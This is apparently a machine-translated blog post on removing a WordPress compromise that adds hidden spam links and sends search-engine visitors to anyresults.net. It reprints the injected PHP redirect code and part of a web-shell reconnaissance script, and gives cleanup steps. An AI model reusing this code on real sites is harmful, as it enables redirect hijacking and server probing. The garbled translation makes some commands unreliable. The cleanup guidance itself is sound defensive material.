病毒博客圈…但是您對我有什麼?

在過去的一個月中,我已經收到了警告 病毒的博客 在一些遊客。 起初,我忽略了警告,因為我安裝了一個相當不錯的防病毒(Kaspersky AV 2009的),雖然很長一段時間的博客,我從來沒有得到病毒警報(..我看到了可疑的東西,第一次刷新消失。最後...)。
慢慢開始出現大的變化 訪客流量後交通最近一直在穩步下降,並開始被越來越多的人告訴我,誰, stealthsettings.COM 這是 病毒之。 我昨天收到從別人做的截圖,當防病毒堵住了 腳本 從 stealthsettings.com:木馬Clicker.HTML.IFrame.gr的。 這是相當有說服力的給我,我把所有源搜索。 來到我的腦海的第一個想法是做 升級 最新版本的 WordPress (2.5.1),而不是以前的老腳本刪除WordPress的所有文件,使 備份數據庫。 這個程序沒有用,如果沒有告訴我,可能要花我很長時間才能弄清楚錯誤在哪裡。 歐根 邊喝咖啡邊討論,他發現 鏈接 谷歌,這將是很好看他。
MyDigitalLife.info發表了一篇文章,標題為:WordPress的哈克:恢復和修復谷歌搜索引擎或無Cookie的流量重定向到你的Needs.info,AnyResults.Net金Info.net和其他非法網站“這就是我所需要的線程結束。
這是關於一個 利用 基於WordPress的餅乾,我認為這是非常複雜的,言書。 聰明足以讓 SQL注入 數據庫的博客, 創建一個不可見的用戶 一個簡單的例行檢查 我的帳戶->用戶, 檢查服務器“可寫的目錄和文件” (用chmod 777的),尋求和 執行 文件的root用戶或組的權限。 我不知道誰剝削的名稱和看他寫的文章,有幾個儘管許多博客被感染,包括羅馬尼亞。 好吧...我會盡量嘗試解釋泛泛的病毒。

是什麼病毒?

首先,將源頁面的博客,遊客看不見,但可見的和可轉位的搜索引擎,尤其是谷歌的鏈接。 如此 把網頁排名的網站的攻擊者表示。 第二,插入另一個 重定向代碼 URL,雅虎,谷歌,現場為遊客來自或RSS閱讀器,而不是網站 餅乾。 一 殺毒軟件 檢測重定向 木馬Clicker.HTML的.

症狀:

大規模遊客流量下降特別是其中大部分遊客來自谷歌的博客。

鑑別: (因此成了問題,誰也不知道如何如何的phpmyadmin,PHP和Linux)

LA。 注意! 首先做一個備份的數據庫!

1。 查看源文件 的index.php, header.php文件, footer.php文件博客話題,看看是否有一個代碼,使用加密 base64 或以以下形式包含“ if($ ser ==” 1?&& sizeof($ _ COOKIE)== 0)”:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

或者什麼的。 刪除此代碼!

點擊圖片...

指數代碼

在上面的屏幕截圖中,我不小心選擇了“ ”。 該代碼必須保留。

2。 使用 phpMyAdmin的 並去到數據庫表 wp_users凡檢查,如果沒有創建的用戶名 00:00:00 0000-00-00 (可能的放置 用user_login 寫“WordPress的”。 寫這個用戶ID(域ID),然後將其刪除。

點擊圖片...

假用戶

*綠線應該除掉,並保留了他的身份證。 的情況下 ID = 8 .

3。 轉到表 wp_usermeta,在哪裡 位於消除 線的編號(在該字段 USER_ID 刪除ID值出現)。

4。 在表 wp_optionactive_plugins 和插件啟用嫌疑。 它可以用來像結局 _old.giff,_old.pngg _old.jpeg,_new.php.giff等豐富的圖片擴展名與_old和_new的組合。

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

刪除此插件,然後轉到博客->儀表板->插件,您可以在其中停用和激活任何插件。

點擊圖片出現active_plugins病毒文件。

插入

按照路徑上的FTP或SSH在active_plugins表示從服務器刪除該文件。

5。 在phpMyAdmin,表 wp_option,查找並刪除行“rss_f541b3abd05e7962fcab37737f40fad8“而在”internal_links_cache“.
在internal_links_cache的加密的垃圾鏈接出現在您的博客和 谷歌的Adsense代碼黑客。

6。 推薦 更改密碼 博客和登錄 刪除所有可疑userele。 升級到最新版本的WordPress的博客設置不允許新用戶註冊。 有沒有損失,無法發表評論和不合邏輯的。

我在上面嘗試了一些解釋,以說明在這種情況下如何清除此病毒的博客。 這個問題比看起來嚴重得多,並且沒有解決,因為它們被使用了 安全漏洞 Web服務器託管,這是博客。

具有訪問權限的安全性,作為第一項措施 SSH,在服務器上進行一些檢查,看看是否有任何文件,如_old *和* _new *結局。吉夫,JPEG,pngg。jpgg。 必須將這些文件刪除。 如果重命名文件,例如。 top_right_old.giff in top_right_old.php我們可以看到,該文件是完全的攻擊代碼服務器。

有關檢查,清潔和固定服務器的一些有用說明。 (通過SSH)

1.  CD / tmp目錄 並檢查是否有文件夾,如 tmpVFlma 或其他組合有相同的名稱,並刪除它。 請看下面的截圖,從我的兩個這樣的文件夾:

tmpserver

使用rm-rf文件夾

2。 盡可能文件夾屬性,檢查elimiati(CHMOD變化) CHMOD 777的

找到所有可寫的 files在當前目錄中: 查找。 型F燙髮2-LS
在當前目錄中找到所有可寫目錄: 查找。 D型燙髮2 LS
找到所有可寫目錄並 files在當前目錄中: 查找。 彼爾姆2 LS

3。 尋找可疑文件服務器上的。

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, 注意! 的文件將被置位 SUID si SGID. 這些文件的用戶(組)或根,而不是執行文件的用戶的權限執行。 這些文件會導致根妥協,如果安全問題。 如果您使用的文件的SUID和SGID位,執行“CHMOD 0“ 或卸載包包含。

利用包含在源某處...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

在這種方式...基本上發現的安全漏洞。 端口打開目錄“可寫”和組執行權限的文件/根。

返回更多...

感染一些博客: www.blegoo.com, www.visurat.ro,

fulgerica.com,denisuca.com,www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro,www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com,www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com,www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/、www.damaideparte.ro,

dragos.roua.ro,www.artistul.ro / blog /,

www.mirabilismedia.ro/blog,blog.einvest.ro
......這樣的例子不勝枚舉......很多。

您可以使用Google搜索引擎檢查博客是否被感染。 複製粘貼:

網站www.blegoo.com採購

晚安,做好工作;)很快,我想Eugen將會在prevezibil.imprevizibil.com上發布新聞。

BRB :)

:注意! 更改WordPress主題或升級到WordPress的2.5.1,不是一個解決辦法擺脫這種病毒。

對技術充滿熱情,我喜歡測試和編寫有關操作系統的教程 macOS,Linux, Windows, 關於 WordPress、WooCommerce 和 LEMP Web 服務器配置(Linux、NGINX、MySQL 和 PHP)。 我寫在 StealthSettings.com 自 2006 年以來,幾年後我開始撰寫 iHowTo.Tips 教程和有關生態系統中設備的新聞 Apple: iPhone,iPad, Apple 手錶,HomePod, iMac, MacBook、AirPods 和配件。

發表評論